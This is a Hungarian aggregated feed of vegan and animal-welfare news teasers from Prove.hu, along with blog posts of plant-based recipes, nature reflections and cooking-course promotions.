Egy friss kutatás alapján valószínűsíthető, hogy a macskák is meggyászolják a velük egy háztartásban élő állatok elvesztését - a kutyákét is. A kedélyállapot rosszabb alvással, kevesebb evéssel és nagyobb figyelemigénnyel jár együtt. Érdekes jelenségre mutatott rá egy új kutatás, ami a macskák viselkedését tanulmányozta. Eszerint a cicák is képesek gyászolni az elvesztett társállatokat. Sőt, még… The post A macskák is gyászolják az elpusztult társállatokat appeared first on Prove.hu.
Lótuszvirágzás
2024. augusztus 6. Élj harmóniában
Lótuszvirágzás... szerencsés dolog, hogy itt Magyarországon lehetőségünk van lótuszvirágzást nézni Vannak helyek a világon, , ahol ez egy mindennapi természetes látvány, de nekünk itt ritka csoda:) S persze nem csak lótusz, de megannyi csodás növény is virágzik így augusztus elején és teljes pompájában mutatja meg magát... A virágok, fák, bokrok mézédes, pikáns, fanyar és mindenféle különleges illatokkal vonzák magukhoz az élőlények figyelmét. . Varázslatos a természet Ha teheted ne hagyd ki ezt a páratlan lehetőséget a Vácrátóti Arborétumban. csodás nyári napokat:) szeretettel Kati
Brit hírességek támogatásával indított új állatvédelmi kampányt az Animals Asia
2024. augusztus 3. Prove - a világ vegán szemmel
A brit kormány tavaly szeptemberben megszavazott egy állatvédelmi törvényt, amit a mai napig nem tudnak a gyakorlatban alkalmazni. Az Animals Asia által indított állatvédelmi kampány célja felhívni a kormány figyelmét a helyzetre, hogy végre használható formába hozzák a megszavazott intézkedést. Sok állatbarát örülhetett tavaly szeptemberben, amikor a brit kormány megszavazta a törvényt, amely megtiltja az… The post Brit hírességek támogatásával indított új állatvédelmi kampányt az Animals Asia appeared first on Prove.hu.
Milliókat fenyeget az angliai alacsony jövedelmű térségekben az extrém hőség
2024. július 31. Prove - a világ vegán szemmel
Az átlaghőmérséklet folyamatos emelkedése sok ember életét veszélyezteti. Különösen rossz helyzetben vannak azok a lakóövezetek, ahol sok beteg, idős, vagy éppen csecsemő lakik. Egy friss elemzés most rámutatott, mely lakóövezetek vannak leginkább kitéve az extrém hőség jelentette veszélyeknek Angliában. Az egyre melegedő éghajlat és a nyaranta jelentkező hőhullámok évről évre nagyobb hatással vannak az emberi… The post Milliókat fenyeget az angliai alacsony jövedelmű térségekben az extrém hőség appeared first on Prove.hu.
Egy évtizede most először csökkent a hústermelés az Egyesült Királyságban
2024. július 19. Prove - a világ vegán szemmel
A megelőző évekhez képest csökkent a hústermelés az Egyesült Királyságban. Ilyen már régóta nem fordult elő, a 2023-as adatok viszont ezt mutatják. Ennek ellenére az össztermelés továbbra is magasabb, mint egy évtizede. Az árak növekedése miatt pedig a megtermelt hús értéke is növekedett. A tavalyi évben 3,7 százalékkal csökkent az Egyesült Királyság hústermelése. Ez 4,1… The post Egy évtizede most először csökkent a hústermelés az Egyesült Királyságban appeared first on Prove.hu.
Omlós meggyes pite: enyhén sós tésztájától lesz különleges
2024. július 5. Prove - a világ vegán szemmel
Ez a meggyes pite nem az, amit a sarki pékségben megszoktál. Tésztája vékonyabb és kevésbé édes, a töltelék pedig két részből áll: az alsó tésztarétegre meggydarabokat teszünk, amire aztán egyenletesen elosztott meggylekvár kerül. A meggy szezonja egészen május végétől július közepéig tart, ezért még bőven elcsíphetsz friss meggyet a boltokban, vagy magad is szedhetsz. De… The post Omlós meggyes pite: enyhén sós tésztájától lesz különleges appeared first on Prove.hu.
A csökkenő biodiverzitás a fő oka a járványok kitörésének
2024. június 12. Prove - a világ vegán szemmel
Felgyorsítja a fertőző betegségek terjedését a biodiverzitás csökkenése egy friss metaanalízis alapján. Vissza kellene szorítani a károsanyag-kibocsátásokat, a vegyi szennyezést és a nem őshonos fajok betelepítését is a tudósok szerint, csak így biztosítható a biológiai sokféleség megőrzése. Ennek révén pedig a járványok megfékezése is. A biológiai sokféleség csökkenése a fertőző betegségek terjedésének legnagyobb környezeti mozgatórugója… The post A csökkenő biodiverzitás a fő oka a járványok kitörésének appeared first on Prove.hu.
Magányos beluga szabadulásáért indult petíció, a tulajdonosok az időt húzzák
2024. június 8. Prove - a világ vegán szemmel
Bella, egy szöuli akváriumban élő beluga szabadon engedését követelik állatvédők. Az állatot közel tíz éve fogták be a Jeges-tenger partjainál. Dél-Koreában azóta betiltották a bálnák és delfinek bemutatási céllal való vásárlását. A törvény azonban visszamenőlegesen nem érvényes, Bella tulajdonosai pedig nem sietik el az intézkedést. Olvastad már Katherine Applegate Ivan, az egyetlen című, igaz történet… The post Magányos beluga szabadulásáért indult petíció, a tulajdonosok az időt húzzák appeared first on Prove.hu.
Győzött az állatjólét: az Egyesült Királyság betiltotta az élőállat-exportot
2024. június 2. Prove - a világ vegán szemmel
Egy fél évszázados harc zárult le májusban az Egyesült Királyságban az élőállat-export betiltásának törvényi szintre emelkedésével. Az állatok élve szállítását már korábban felfüggesztette a kormány, de az aktivisták féltek, hogy csak ideiglenes intézkedésekről van szó. A továbbiakban ettől már nem kell tartani. Az Egyesült Királyság is csatlakozott azon országok (nagyon rövid) listájához, akik betiltották az… The post Győzött az állatjólét: az Egyesült Királyság betiltotta az élőállat-exportot appeared first on Prove.hu.
Bazsalikomos paradicsomsaláta
Jön a nyár, amikor lassan a kertekben érik a paradicsom, a levegőt betölti a friss zöldfűszerek illatai. És eljön az idő, hogy a legkevesebb hozzávalóból remek fogásokat varázsoljunk az asztalra. Képzelj el egy tányér érett, szaftos paradicsomot, amit csak egy kevés olívaolajjal és friss bazsalikommal ízesítünk. Az olívaolaj lassan összefolyik a paradicsomok piros felületén, a bazsalikom levelei között ott bujkál az ígéret: egy falat, és az ízek robbannak a szádban. A paradicsom természetes édessége, az olívaolaj gazdag, simogató textúrája, a bazsalikom frissessége - minden egyes falat a nyár ízét hordozza, és elrepít a tengerparti szellővel fűszerezett nyaralások emlékéhez. Ehhez a paradicsomsalátához akár csak egy egyszerű pirítóst is kínálhatsz, de gazdag grillzöldség-tál vagy krémes tésztaétel kísérője is lehet. Hozzávalók: 80 dkg paradicsom 1 kk só 3-4 ek olívaolaj 5-6 bazsalikomlevél felaprítva fél ek balzsamecet A megmosott, megtisztított paradicsomokat felkockázzuk, koktélparadicsom esetén felezzük vagy negyedeljük. Salátás tálba tesszük, megsózzuk. Meglocsoljuk az olívaolajjal és balzsamecettel, megszórjuk a felaprított bazsalikommal. Jól átkeverjük, és egy kicsit pihentetjük, hogy az ízek összeérjenek.
Soha nem emelkedett még ennyit egy év alatt a légköri szén-dioxid
2024. május 14. Prove - a világ vegán szemmel
Az egy év leforgása alatt valaha mért legnagyobb légköri szén-dioxid-emelkedésről számoltak be kutatók egy hawaii mérőállomás adatai alapján. Az emelkedést tavaly márciustól idén márciusig figyelték meg. A Mauna Loa Obszervatórium 1958 óta végez méréseket a légkör szén-dioxid-szintjére vonatkozóan. Ennek az üvegházhatású gáznak a jelenlétét általában ppm-ben határozzák meg: ez arra utal, hogy egymillió levegőrészecskéből mennyit… The post Soha nem emelkedett még ennyit egy év alatt a légköri szén-dioxid appeared first on Prove.hu.
Ovádi Péter: A magyar haszonállat-védelem első osztályú
2024. május 10. Prove - a világ vegán szemmel
A magyar állatvédelem kulcsfigurája ma - a civil aktivisták mellett - Ovádi Péter állatvédelemért felelős kormánybiztos. Az eddigi intézkedésekről, a tervezett jövőbeli lépésekről, a cirkuszi állatokról és a haszonállatokat érintő jóléti kérdésekről is beszélgettünk vele. Prove-interjú. Ovádi Péter 2018-ban lett Veszprém vármegye 1. számú országgyűlési egyéni választókerületének képviselője. Már ekkor is programjának központi eleme volt… The post Ovádi Péter: A magyar haszonállat-védelem első osztályú appeared first on Prove.hu.
Anyák napja
2024. május 5. Élj harmóniában
Napsütéses, madárdalos Anyák napja... imádott Anyósommal Sajnos az Én szeretett, drága, kedves Édesanyám már nem tud Velünk lenni, de a szívemben örökké ott lesz.... Soha nem lehetek Neki elég hálás mindazért, hogy Tőle kaptam az életem, megannyi kedvességet, törődést, gondokodást, tanítást, élettapasztalatot, értékrendet és hihetetlen mennyiségű önzetlen szeretetet, elfogadást és türelmet. Ezeket gyerekként nem is tudtam mekkora kincsek... az ember mindig utólag látja meg igazán valaminek az értékét. Hálás szívvel köszönöm, hogy Ő volt az Édesanyám és hálás vagyok azért, hogy most van egy ilyen kedves anyósom szeretettel gondolok mindkettőjükre KAti
Zöldborsós zöldség subji - zöldséges főétel
2024. április 28. Élj harmóniában
A melegebb időjárásnak köszönhetően, a zöldségszezon idén előbb kezdődött:) A Bio piacról a férjem tegnap megannyi ízletes, finom, friss, hazai zöldséget hozzott - brokkoli, sárgarépa, cékla, saláták, koriander, zöldborsó és még friss cukkinit is hozott. Ezt zöldséges főételt, ha más zöldségekkel készíted el, akkor is nagyon finom lesz. H ozzávalók 2 csésze felaprított brokkoli 1 csésze felaprított cukkini 1 csésze felaprított sárgarépa 1/2 csésze zöldborsó 2 ek. ghí (vegán változatban kókuszzsír) 1 tk. édesköménymaf 1 tk. római kömény 1/4 tk. lepkeszegmag 1 tk. őrölt koriander 1/4 tk. garam masala Vegyszermentes (bio) alapanyagokat használj! A zöldségeket mosd meg és vágd darabokra. Melegítsd fel az edényt és tedd bele a ghít, majd add hozzá az édesköményt, római köményt és a lepkeszegmagot. Ha pirulni kezdett add hozzá a koriandert és a masalakeveréket. Picit keverd meg és tedd hozzá a brokkolit, a sárgarépát és a zöldborsót és 1/2 csésze vizet. Hagyd picit puhulni, majd add hozzá a cukkinit is. Keverd úgy össze, hogy a fűszerek jól elkeveredjenek a zöldségekkel. Vedd le kisebb fokozatra és tedd rá a fedőt. addig főzd takarékon, amíg meg nem puhulnak a zöldségek. Én ma kókuszos, kardamomos baszmatirizst készítettem hozzá, de bármilyen gabonával tálalhatod. A végén mindig meglocsolom egy kis ghível. Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat kívánok:) szeretettel: KAti #recept #táplálkozás #ájurvédikus #vegán #vegetáriánus #cukkini #zöldborsó #sárgarépa ##gluténmentes #zöldséges #tojásmentes #tejmentes
Utah lehet az első amerikai állam, ami megszüntetné a menhelyi állatok eutanáziáját
2024. április 27. Prove - a világ vegán szemmel
Az állam kormányzója no-kill évnek nyilvánította 2024-et, ami jelentős lépés afelé, hogy az államban teljesen megszűnjön a menhelyen lévő állatok eutanáziája. Ezzel Utah lehetne az USA legnagyobb no-kill állama, az első az ország nyugati felén. A nyilatkozatot állatvédők több évtizedes kampánymunkája előzte meg, ennek a gyümölcse érett most be. Utah állam kormányzója, Spencer Cox a… The post Utah lehet az első amerikai állam, ami megszüntetné a menhelyi állatok eutanáziáját appeared first on Prove.hu.
Videón, ahogy autók között bandukolt az elszabadult cirkuszi elefánt - nem élvezhette sokáig a szabadságot
2024. április 21. Prove - a világ vegán szemmel
A montanai lakosok legnagyobb döbbenetére vadállat, mégpedig egy szökött cirkuszi elefánt okozott közlekedési fennakadásokat Butte városában. Végül emberek nem sérültek meg, az állatot pedig az esti műsorban már szerepeltették is. A PETA állatvédői az eset kapcsán arra buzdítanak mindenkit, hogy ne támogassák jegyvásárlással az állatokat is porondra léptető cirkuszokat. Elszabadult egy elefánt egy vándorcirkuszból az… The post Videón, ahogy autók között bandukolt az elszabadult cirkuszi elefánt - nem élvezhette sokáig a szabadságot appeared first on Prove.hu.
Édesburgonya-krémleves: selymesen krémes, isteni, egyszerű ebéd
2024. április 17. Prove - a világ vegán szemmel
Több okunk is van rá, miért ez az édesburgonya-krémleves a legjobb választás, ha nem tudod, mit főzz. Egyrészt megfőzi magát, tehát alig van vele tennivaló, mégis rendkívül ízletes, izgalmas ízvilágú étel kerekedik belőle a végére. Másrészt édessége ellenére az egyik legegészségesebb zöldségről van szó: olvass tovább, ha kíváncsi vagy, milyen egészségügyi előnyökkel jár az édesburgonya… The post Édesburgonya-krémleves: selymesen krémes, isteni, egyszerű ebéd appeared first on Prove.hu.
Megérkezett a meleg
2024. április 7. Élj harmóniában
Mintha nyár lenne... szinte égettek a nap sugarai, alig volt felhő az égen, szikrázott a napsütés a sziklákon. S persze még nincs nyár, tavasz van... minden üdezöld és most kezdenek csak a fák lombkoronát bontani - hétről, hétre egyre zöldebb lesz a táj. Nagyon szeretek újra és újra ugyanzon helyekre járni, mert ahogy egy embert is úgy tudunk megismerni, ha sok időt töltünk vele, így egy tájat, erdőt, környéket is. S az igazi élvezet nem az újdonságból jön, hanem abból, hogy ami ismerős ott tudjuk, hogyan tudjuk fokozni az élvezetet. Imádom, ahogy a természet napról, napra változik és nem tudok kétszer ugyanazon útvonal érzéssel végigmenni, mert mindig felfedezek valami csodát, valamit ami más, amitől izgalmasabb, szebb, illatosabb, látványosabb az adott néhány méter.... A kedvenc időszakom a tavasz, mert a hegytetőkön, napsütötte területeken hihetetlenül sokféle virág bont szirmot, gyönyörködtetve a látvánnyal és mézédes illatával a kirándulókat. Virág kínálat bővülés a múlt héthez képest a képeken:) Fantasztikus, de már a kakukkfű is virágzik, kicsit sietős neki :)))
Horror az állatsimogatóban: tizenegy állattal végzett egy kilencéves fiú
2024. április 3. Prove - a világ vegán szemmel
Kilenc nyulat és két tengerimalacot fojtott meg egy holland iskolás gyermek egy Hoek van Holland-i állatsimogatóban. A fiú már több alkalommal járt a szüleivel a helyszínen, legutóbb viszont egyedül érkezett. A brutális eset nemcsak az iskolás gyermek esetleges mentális vagy viselkedésbeli problémáival kapcsolatban vet fel kérdéseket, de az állatsimogatót felügyelő dolgozók felelősségére is figyelmet irányít.… The post Horror az állatsimogatóban: tizenegy állattal végzett egy kilencéves fiú appeared first on Prove.hu.
Ezekkel a vegán édességekkel készülhet a húsvéti nyuszi
2024. március 30. Prove - a világ vegán szemmel
Már a magyar piacon is sokféle vegán húsvéti édesség megtalálható: csokinyuszi, csokitojás és nyuszis gumicukor is beszerezhető növényi alapokon. De akár házilag is elkészülhetnek - részben vagy egészben - a húsvéti finomságok. Néhány évvel ezelőtt még komoly fejtörést okozott a vegán családokban, mivel is lepheti meg a gyerekeket a húsvéti nyuszi. Nem is olyan régen… The post Ezekkel a vegán édességekkel készülhet a húsvéti nyuszi appeared first on Prove.hu.
Meggyes-grízes rétes
A legjobb meggyes-grízes rétest a nagymamám sütötte. Sajnos a receptet nem tanultam meg tőle, de ez a mostani egészen hasonló hozzá. Egy csomag (6 lap) rétesből 2 rudat sütök, azaz 3 lapból lesz egy rúd rétes. Hozzávalók: 1 csomag réteslap 3 dl búzadara 2 dl tejföl egy csipet só 5 ek olaj 4-5 ek negyedannyi édesítő (vagy 2 dl cukor) kb. 1,5 dl meggylé (amit a mirelit enged, vagy befőttnek a leve, ha azt használunk) 2×45 dkg mirelit magozott meggy (befőtt is lehet) Egy tálban elkeverem a töltelékhez valókat: a búzadarát, a tejfölt, a sót, az olajat, az édesítőt és a meggy levét. Nem legyen túl száraz, de folyós sem, inkább krémes, könnyen kanalazható. 15-20 percig állni hagyom. Fogok egy réteslapot, nagyon vékonyan megkenem tejföllel, ráteszek még egyet, azt is megkenem, majd ráhelyezem a harmadik lapot. A közepére teszem a töltelék felét, kanállal elegyengetem és rárakom az egyik csomag magozott meggyet. Feltekerem, tepsire rakom. Ugyanígy összeállítom a másik tekercset is, az első mellé helyezem. A tetejüket is megkenem nagyon vékonyan tejföllel, majd előmelegített sütőben, 180 fokon nagyjából 20 percig sütöm, amíg szép aranybarna lesz.
Fényes jövő áll a növényi fehérjeforrások előtt: a borsófehérje lehet a következő évek sztárja
2024. március 27. Prove - a világ vegán szemmel
A USD Analytics legfrissebb elemzése stabil növekedést jósol a növényi fehérjeszektornak a következő hat évben. A trendet a fogyasztók egészségügyi, fenntarthatósági és állatjóléti megfontolásokat figyelembe vevő döntései hajtják. A leggyorsabb növekedést a borsófehérje produkálhatja számos pozitív tulajdonsága miatt. Ráadásul a növény termesztése sem igényel különösebb erőforrásokat. A növényi alapú alternatív fehérjeforrások piacán előreláthatóan 8,1 százalékos… The post Fényes jövő áll a növényi fehérjeforrások előtt: a borsófehérje lehet a következő évek sztárja appeared first on Prove.hu.
A növényi fehérjét fogyasztó nőknél jellemzőbb az egészséges öregedés
2024. március 16. Prove - a világ vegán szemmel
Egy friss tanulmány eredményei alapján azoknál a nőknél, akik elegendő fehérjét, méghozzá leginkább növényi eredetű fehérjét fogyasztanak, kisebb arányban alakultak ki krónikus betegségek öregkorukra. Az állati fehérjéket fogyasztóknál a betegségek gyakrabban fordultak elő. Az egészséges öregedés nagy valószínűséggel a növényekben található számos jótékony tápanyagnak is köszönhető. A bostoni Tufts University kutatói több ezer nő táplálkozási… The post A növényi fehérjét fogyasztó nőknél jellemzőbb az egészséges öregedés appeared first on Prove.hu.
A tavaz érintése
2024. március 3. Élj harmóniában
A tavaszi napsugrak simogató érintése, az ibolya és a virágzó fák illatfelhője mámorossá teszi az embert Ppróbálok annyi illatélményt gyűjteni, ami kitart a jövő tavaszig Éled a természet , hétről, hétre növeledés, terjeszkedés, ujjászületés... mindenhol teremtő energiak... az elmúlt 1 hónapban 4 boci érkezett és sorra jönnek a többiek. Minden évben ámulattal tölt el ez az időszak, ahogy az élet megnyilvánul és minden képes a megújulásra. Mindenkinek csodás tavaszi illatmámort kívánok:) szeretettel Kati #tavasz #napsütés #természet #ébredezőtermészet #csodaszép #gyönyörű #virágok #fák #levelek #újjászületés #
Állatkísérleti labort zártak be, kutyák és macskák százai menekültek meg
2024. február 28. Prove - a világ vegán szemmel
Több mint kétszáz kutya és macska szabadult meg az addig mindennapos kínoktól és szenvedésektől. Ez annak köszönhetően történhetett meg, hogy a Beagle Freedom Project felszámolt egy állatkísérleti labort, a helyszínt pedig menhellyé alakítják át. Az egész világon leginkább a beagle fajtát használják az olyan állatkísérletekben, ahol az alany kutya. A beagle legendásan jámbor, az emberben… The post Állatkísérleti labort zártak be, kutyák és macskák százai menekültek meg appeared first on Prove.hu.
Kitalált lehet a vashiányos vegán blogger, akivel a Blikk PR-cikke riogatja az olvasókat
2024. február 21. Prove - a világ vegán szemmel
Evelin, egy vashiányos vegán nő a Blikk PR-anyagának főhőse, aki növényi étrend mellett csak vaspótló szedésével tudott úrrá lenni fáradékonyságán és egyéb tünetein. A jelek azonban arra utalnak, hogy Evelin csak egy kitalált figura - ezzel együtt kiváló fegyver a vegán étrend ellen kampányolók eszköztárában. A cikkel kapcsolatban megkerestük a Blikket és a vaspótlót kínáló… The post Kitalált lehet a vashiányos vegán blogger, akivel a Blikk PR-cikke riogatja az olvasókat appeared first on Prove.hu.
Egész mungóbab leves - zöld mung dhal
2024. február 12. Élj harmóniában
A blogon már több dhal receptet is olvashattál. A dhalok sűrű hüvelyesből készült leves félék, melyek nagyon táplálóak, magas a fehérjetartalmuk és a húsmentes táplálkozás fontos alapját képzik. Magyarországon elsődlegesen a mungóbab zöld változatát lehet kapni - ahol a külső réteg még rajta van a hüvelyesen. A blogra már több mung dhal receptet is kitettem, amik a zöld külső réteg eltávolítása után maradt belső sárga babból készülnek -ez a legkönnyebben emészthető hüvelyes. Gondoltam itt az idő megismeretnem veletek a zöld változatot. Szoktam használni a zöl feles változatát is, ami a kettő közötti átmenet. A zöld mungóbab ájurvédikus megközelítésben fanyar és édes, ezért hűsítő energiája van és egy könnyebben emészthető hüvely fajta. Mindhárom doshára kedvezően hat. Hozzávalók 1 csésze zöld mungóbab 5 - 6 csésze víz 2 ek. ghí 1 tk. római kömény 1 tk. fekete mustármag 1/2 tk. asafoetida 5 currylevél frissen vagy szárítva 1 kis marék korianderlevél apróra vágva 1/2 tk. kurkuma 1 tk. masala por 1/2 tk. só Elkészítés Alaposan mosd meg a zöld mungóbabot és éjszakára áztasd be egy nagy tál vízbe. Reggel szűrd le és tedd oda egy egénybe a babot 4 csésze vízzel és forrald fel. Főzd közepes lángon, fedő nélkül 30 percig. Néha keverd meg néha, ne égjen le az alja. Majd 30 perc után tegyél hozzá még 1 csésze vizet és főzd tovább 15-20 percig, vagy amíg a bab meg nem puhul. Egy másik edényben melegítsd fel a ghít, majd tedd bele a mustármagot, a római köményt és az asafoetidát egy pillanatra Add hozzá a curry leveleket, koriandert, kurkumát és a masala port és keverd össze. A fűszerkeveréket tedd át a levesbe és add hozzá a sót és az utolsó csésze víz egy részét vagy egészét, attól függően, hogy milyen sűrűre szeretnéd a levest. Végül még 2 - 3 percig forrald. Chapatival , baszmati rizzsel, purival, vagy kenyérrel tálalhatod és friss korianderrel díszítheted a tetjét. Mindegyikhez találsz recepteket a blogon. Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat kívánok :) szeretettel: Kati #mungóbab #mungdhal #recept #vegetáriánus #vegán #gluténmentes #tejmentes #leves #dál #dhal #hüvelyes
Döntött a bíróság: ,,deviáns farkasra lőni ér, de csak paintballpisztollyal
2024. február 7. Prove - a világ vegán szemmel
A holland hatóságoknak egy bírósági határozat alapján engedélyezett paintballpisztollyal farkasra lőni. Az ítéletet arra hivatkozva hozták meg, hogy az állatok egyre bátrabban közelítik meg az embereket, úgy tűnik, nem tartanak már tőlük. A közép-hollandiai Utrechtben működő bíróság úgy döntött, hogy egyes farkasok viselkedése egy nemzeti parkban igenis komoly veszélyt jelenthet a közbiztonságra. Emiatt pedig arra… The post Döntött a bíróság: ,,deviáns farkasra lőni ér, de csak paintballpisztollyal appeared first on Prove.hu.
Tejiparellenes reklámban szerepel a Maffiózók sorozat sztárja
2024. február 3. Prove - a világ vegán szemmel
Az állatvédő szervezet tejiparellenes kisfilmet forgatott a Super Bowl alkalmából. A reklámban Edie Falco, a PETA tiszteletbeli igazgatója szerepel, aki a The Sopranos (Maffiózók) nagy sikerű televíziós sorozatban Carmela Soprano szerepét játszotta. A reklámfilm ezt a kontextust felhasználva mutatja be a szenvedést, amit a teheneknek el kell viselniük, hogy mi sajtot ehessünk. A People for… The post Tejiparellenes reklámban szerepel a Maffiózók sorozat sztárja appeared first on Prove.hu.
Több mint egymillióval nőtt a brit vegánok száma egy év alatt
2024. január 22. Prove - a világ vegán szemmel
Az Egyesült Királyság felnőtt lakosságának közel 5 százaléka követ növényi alapú étrendet. A tavalyi évben több mint egymillió brit váltott teljes mértékben növényi étrendre. Ennek tudható be a nagymértékű növekedés a brit vegánok számában. A teljesen növényi étrendet követők mellett sokan vannak még vegetáriánusok, peszkatáriánusok és olyanok is, akiknek eltökélt szándéka, hogy húsmentes módon táplálkozzanak.… The post Több mint egymillióval nőtt a brit vegánok száma egy év alatt appeared first on Prove.hu.
Édes-savanyú tofu: mennyei húsmentes fogás januárra
2024. január 15. Prove - a világ vegán szemmel
Ha valami különlegeset keresel, akkor ez a könnyen elkészíthető, de rendkívül izgalmas édes-savanyú tofu neked való. Ebben a tisztán növényi alapú fogásban az erőteljes, egymást tökéletesen ellensúlyozó, édes-savanyú ízeké a főszerep. Sokan imádják az édes-savanyú ízvilágot, de kevesen próbálják meg otthon elkészíteni, mert tévesen azt hiszik, nehezen beszerezhető összetevőkre és bonyolult konyhai műveletekre van szükség… The post Édes-savanyú tofu: mennyei húsmentes fogás januárra appeared first on Prove.hu.
Kitalálod, miből készültek ezek a vegán jégkrémek?
2023. december 31. Prove - a világ vegán szemmel
Garantáltan nem találod ki, milyen zöldségből készített vegán jégkrémet egy új-zélandi cég. A helyi vásárlók már tesztelhetik is az újítást, 90 boltban kapható a termék, háromféle ízben. Ha azt mondom, karfiol, elég sok felhasználási módra lehet asszociálni: készülhet belőle leves, rántott vagy rakott verzió, édes-savanyú falatok, de akár egészben is meg lehet sütni. Arra azonban… The post Kitalálod, miből készültek ezek a vegán jégkrémek? appeared first on Prove.hu.
Zöld lasagne spenóttal és cukkinivel elkészítve
2023. december 23. Prove - a világ vegán szemmel
Simán el lehet készíteni az eredeti ,,piros lasagnét is növényi verzióban, de néha muszáj fejet hajtani a vegán sztereotípiák előtt, és mindent ,,zöld verzióban megcsinálni. A viccet félretéve, a lasagne szó szerint nagyon sokszínűen elkészíthető a hagyományos verzión kívül: narancssárgán sütőtökkel és/vagy édesburgonyával, lilán céklával, padlizsánnal és/vagy lila káposztával vagy épp zölden, spenóttal és cukkinivel.… The post Zöld lasagne spenóttal és cukkinivel elkészítve appeared first on Prove.hu.
A klímaváltozás elmoshatja a floridai fehérfarkú szarvas élőhelyét
2023. december 8. Prove - a világ vegán szemmel
A floridai fehérfarkú szarvas eleve veszélyeztetett faj, a felmelegedés miatt emelkedő vízszint pedig tovább rontja a túlélési esélyeit. A természettudósok tanácstalanok: ha áttelepítik biztonságosabb területre ezeket az állatokat, azzal a helyi ökoszisztémát zavarják meg teljesen. Florida déli partjainál fekszik egy szigetcsoport: Florida Keys, itt él a fehérfarkú szarvas. A jégkorszak lezárulta vágta el a szárazföldtől… The post A klímaváltozás elmoshatja a floridai fehérfarkú szarvas élőhelyét appeared first on Prove.hu.
Új kutatás: nem minden ultrafeldolgozott élelmiszer ugyanolyan káros
2023. december 5. Prove - a világ vegán szemmel
Egy friss kutatás szerint a növényi alapú ultrafeldolgozott élelmiszerek nem köthetők a különböző rákos vagy szív- és érrendszeri megbetegedések kockázatának növekedéséhez. Az állati eredetű ultrafeldolgozott élelmiszerek kapcsán viszont találtak összefüggést a kutatók. Ez a kohorszvizsgálat az egyik első, amely a multimorbiditás és a feldolgozott élelmiszerek kapcsolatát vizsgálta. A The Lancetben megjelent friss kutatás arra jutott,… The post Új kutatás: nem minden ultrafeldolgozott élelmiszer ugyanolyan káros appeared first on Prove.hu.
Káposztás-spenótos spanakopita
Vegán karácsonyi vacsora főzőtanfolyam egy Fantasztikus menü, amivel új hagyományt teremthetsz magadnak.
Részletek és jelentkezés ITT
Ajándékozz karácsonyra főzőtanfolyamot!
Az akció részleteiért KATT IDE
Ajándékot kaptam a Bioenergetic kiadótól: Niki Webster – Világjáró vegán szakácskönyv c. szakácskönyvét. Elég sok hasonló szakácskönyvet láttam, de amikor ezt kinyitottam, nem tudtam letenni. Egyszerűen muszáj volt rögtön végiglapoznom, annyira gusztusos és változatos az összeállítás. Kifejezetten fiatalos, lendületes kötet, amelyben ugyanúgy vannak sosem látott különlegességek, mint ismerősebb ételek is. A hozzávalókról ugyanez mondható el, de biztos vagyok benne, hogy a spécibb alapanyagokat is fel lehet kutatni valahol.
A teljesség igénye nélkül kis ízeltő a zavarba ejtő kínálatból, mert összesen több mint 75 receptet tartalmaz a könyv
- Reggelik Svájcból és Ugandából
- Könnyű falatok a közel-keletről és Mexikóból
- Családi kedvencek Sri Lankáról és Spanyolországból
- Parti kaják Ausztráliából és Kínából és
- Édes csemegék Hollandiából és D-Amerikából
És, hogy én mit késztettem el belőle először? Naná, hogy a görög spanakopitát! :)
Csináltam már egyszer hasonlót , mégis kíváncsivá tett ez a változat, mert ennél a receptnél a spenótot káposztával keverve kell a tésztába tölteni. A párolt káposzta igazi téli étel, volt is itthon egy kis maradék fej káposzta, ami mintha csak erre várt volna.
Hozzávalók:
- 400 g fejeskáposzta
- 300 g mélyhűtött spenótlevelek
- 200 g marinált tofu lemorzsolva
- 1 póréhagyma
- 1 csomag réteslap (9 lap)
- 2 ek szárított petrezselyem
- 1 kk szárított menta
- 1 kk szárított kapor
- fél citrom leve
- 1 ek szezámmag
- 2 kk só
- 3 ek olaj
- Végy egy nagyobb lábost, és az olajon párold meg a felkarikázott póréhagymát, ami 10 percig tart kb.
- Közben vágd finomra a káposztát, és ha kész a hagyma, tedd hozzá. Hagyd párolódni 20 percig.
- Keverd bele a spenótot, a szétmorzsolt morzsolt tofut, a citromlevet és a fűszereket. 20 perc további párolást kell majd neki. A párolás közben mindig önts alá pici vizet, hogy tudjon gőzölődni, és nehogy odakapjon.
- Ha kész, láss neki az összeálltásnak. Ez nagyon szórakoztató művelet lesz. :) A réteslapokat egyenként olajozd meg és egyik oldalára tegyél egy csíkot a spenótos töltelékből. Görgesd fel a tésztát egy kígyóba, majd fektesd egy kerek, kiolajozott sütőtálba. A megtöltött tekercseket folytatólagosan fektesd le kívülről befelé, majd amikor végeztél, hintsd meg a tetejét szezámmaggal.
- Közepes sütőben süsd, amíg a teteje szép barna nem lesz.
Elkészítési idő: 60 perc + sütés
Jó étvágyat!
Ez egy vegán recept volt. :)
Hasonló recepteket ITT találsz még.
Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :)
Ajándékozz karácsonyra főzőtanfolyamot!
Az akció részleteiért KATT IDE
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat:
Karácsonyi Szeretet menü
Kezdő Vegán
Haladó vegán (Superfood)
The post Káposztás-spenótos spanakopita first appeared on Kertkonyha.
Nőtt a legnagyobb állati fehérjét előállító cégek kibocsátása
2023. november 28. Prove - a világ vegán szemmel
A FAIRR-jelentés alapján az elmúlt évhez képest több mint három százalékkal emelkedett a legnagyobb állatipari cégek kibocsátása. A jelentés alapján csupán hét olyan cég van, amelyeknek sikerült az értékeiket csökkenteniük. Ez önmagában kevés ahhoz, hogy a többiek megnövekedett számait ellensúlyozni tudják. A közzétett publikáció egybecseng a State of Climate Action 2023 eredményeivel, amely szintén úgy… The post Nőtt a legnagyobb állati fehérjét előállító cégek kibocsátása appeared first on Prove.hu.
Vegán datolyakaramella négy összetevőből elkészítve
2023. november 28. Prove - a világ vegán szemmel
